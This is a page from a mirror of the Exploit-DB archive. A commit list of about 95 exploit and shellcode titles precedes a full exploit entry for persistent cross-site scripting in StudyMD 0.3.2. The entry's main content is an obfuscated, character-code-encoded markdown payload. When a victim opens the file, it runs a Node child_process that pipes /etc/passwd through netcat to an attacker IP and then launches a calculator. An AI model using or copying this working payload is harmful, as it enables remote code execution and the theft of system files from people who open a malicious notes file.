bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/49832.js
Offensive Security de260aeac6 DB: 2021-10-30 
95 changes to exploits/shellcodes

Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC)
Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC)
AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)
Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)
WordPress Plugin WPGraphQL 1.3.5 - Denial of Service
Sandboxie 5.49.7 - Denial of Service (PoC)
WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC)
iDailyDiary 4.30 - Denial of Service (PoC)
RarmaRadio 2.72.8 - Denial of Service (PoC)
DupTerminator 1.4.5639.37199 - Denial of Service (PoC)
Color Notes 1.4 - Denial of Service (PoC)
Macaron Notes great notebook 5.5 - Denial of Service (PoC)
My Notes Safe 5.3 - Denial of Service (PoC)

n+otes 1.6.2 - Denial of Service (PoC)

Telegram Desktop 2.9.2 - Denial of Service (PoC)

Mini-XML 3.2 - Heap Overflow
Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (2)
Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (3)
Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1)
Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)

MariaDB 10.2 - 'wsrep_provider' OS Command Execution

Microsoft Internet Explorer 11 and WPAD service 'Jscript.dll' - Use-After-Free

Visual Studio Code 1.47.1 - Denial of Service (PoC)

DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE)

MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2)

Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC)

GNU Wget < 1.18 - Arbitrary File Upload (2)

WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS)

E-Learning System 1.0 - Authentication Bypass

PEEL Shopping 9.3.0 - 'Comments' Persistent Cross-Site Scripting

GetSimple CMS 3.3.16 - Persistent Cross-Site Scripting

EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Persistent Cross-Site Scripting

Selea Targa 512 IP OCR-ANPR Camera - Stream Disclosure (Unauthenticated)

Library System 1.0 - Authentication Bypass

Web Based Quiz System 1.0 - 'name' Persistent Cross-Site Scripting

Dolibarr ERP 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE)

GetSimple CMS My SMTP Contact Plugin 1.1.1 - Cross-Site Request Forgery

GravCMS 1.10.7 - Unauthenticated Arbitrary File Write (Metasploit)

Umbraco v8.14.1 - 'baseUrl' SSRF

Cacti 1.2.12 - 'filter' SQL Injection

GetSimple CMS Custom JS 0.1 - Cross-Site Request Forgery

Internship Portal Management System 1.0 - Remote Code Execution(Unauthenticated)
Markdown Explorer 0.1.1 - Persistent Cross-Site Scripting
Xmind 2020 - Persistent Cross-Site Scripting
Tagstoo 2.0.1 - Persistent Cross-Site Scripting
SnipCommand 0.1.0 - Persistent Cross-Site Scripting
Moeditor 0.2.0 - Persistent Cross-Site Scripting
Marky 0.0.1 - Persistent Cross-Site Scripting
StudyMD 0.3.2 - Persistent Cross-Site Scripting
Freeter 1.2.1 - Persistent Cross-Site Scripting
Markright 1.0 - Persistent Cross-Site Scripting
Markdownify 1.2.0 - Persistent Cross-Site Scripting
Anote 1.0 - Persistent Cross-Site Scripting
Subrion CMS 4.2.1 - Arbitrary File Upload
Printable Staff ID Card Creator System 1.0 - 'email' SQL Injection

Schlix CMS 2.2.6-6 - Arbitary File Upload (Authenticated)

Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver)

CHIYU IoT Devices - Denial of Service (DoS)

Zenario CMS 8.8.52729 - 'cID' SQL injection (Authenticated)

TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)

WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal

Atlassian Jira Server Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS)

Scratch Desktop 3.17 - Remote Code Execution

Church Management System 1.0 - Arbitrary File Upload (Authenticated)

Phone Shop Sales Managements System 1.0 - Arbitrary File Upload

Zoo Management System 1.0 - 'Multiple' Persistent Cross-Site-Scripting (XSS)

WordPress Plugin Current Book 1.0.1 - 'Book Title' Persistent Cross-Site Scripting

ForgeRock Access Manager 14.6.3 - Remote Code Execution (RCE) (Unauthenticated)

KevinLAB BEMS 1.0 - Authentication Bypass

Event Registration System with QR Code 1.0 - Authentication Bypass

CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF)

Panasonic Sanyo CCTV Network Camera 2.03-0x - Cross-Site Request Forgery (Change Password)

qdPM 9.2 - Password Exposure (Unauthenticated)
ApacheOfBiz 17.12.01 - Remote Command Execution (RCE)
Movable Type 7 r.5002 - XMLRPC API OS Command Injection (Metasploit)

GeoVision Geowebserver 5.3.3 - Local FIle Inclusion

Simple Phone Book 1.0 - 'Username' SQL Injection (Unauthenticated)

Umbraco CMS 8.9.1 - Directory Traversal

Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)

Dolibarr ERP 14.0.1 - Privilege Escalation

Compro Technology IP Camera - 'killps.cgi' Denial of Service (DoS)

Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation

Phpwcms 1.9.30 - Arbitrary File Upload

Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes)
Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)
Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes)
Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)
Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes)
Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes)
Linux/x86 - setreuid(0) + execve(_/bin/sh_) Shellcode (29 bytes)
Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes)
Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)
Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode
Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)
Windows/x86 - MessageBoxA PEB & Export Address Table NullFree/Dynamic Shellcode (230 bytes)
2021-10-30 05:02:09 +00:00

27 lines
No EOL
3.4 KiB
JavaScript
Raw Permalink Blame History

# Exploit Title: StudyMD 0.3.2 - Persistent Cross-Site Scripting
# Exploit Author: TaurusOmar
# Date: 04/05/2021
# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
# Risk: High (8.8)
# Vendor Homepage: https://github.com/jotron/StudyMD
# Version: 0.3.2
# Tested on: Windows, Linux, MacOs
# Software Description:
A cool app to study with markdown. Turns your Markdown-Summaries to Flashcard.
Allows user to create flash cards based on markdown files (.md) for easy viewing of their structure.
# Vulnerability Description:
The software allows you to store payloads within your flash card manager, as well as upload files (.md) once the malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the
the remote attacker to get remote execution on the computer.
#Proof Video
https://imgur.com/a/lDHKEIp
# Payload: exec(AttackerReverse netcat stolen => /etc/passwd) && exec(calc)
[<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>](http://)
Reference in a new issue View git blame Copy permalink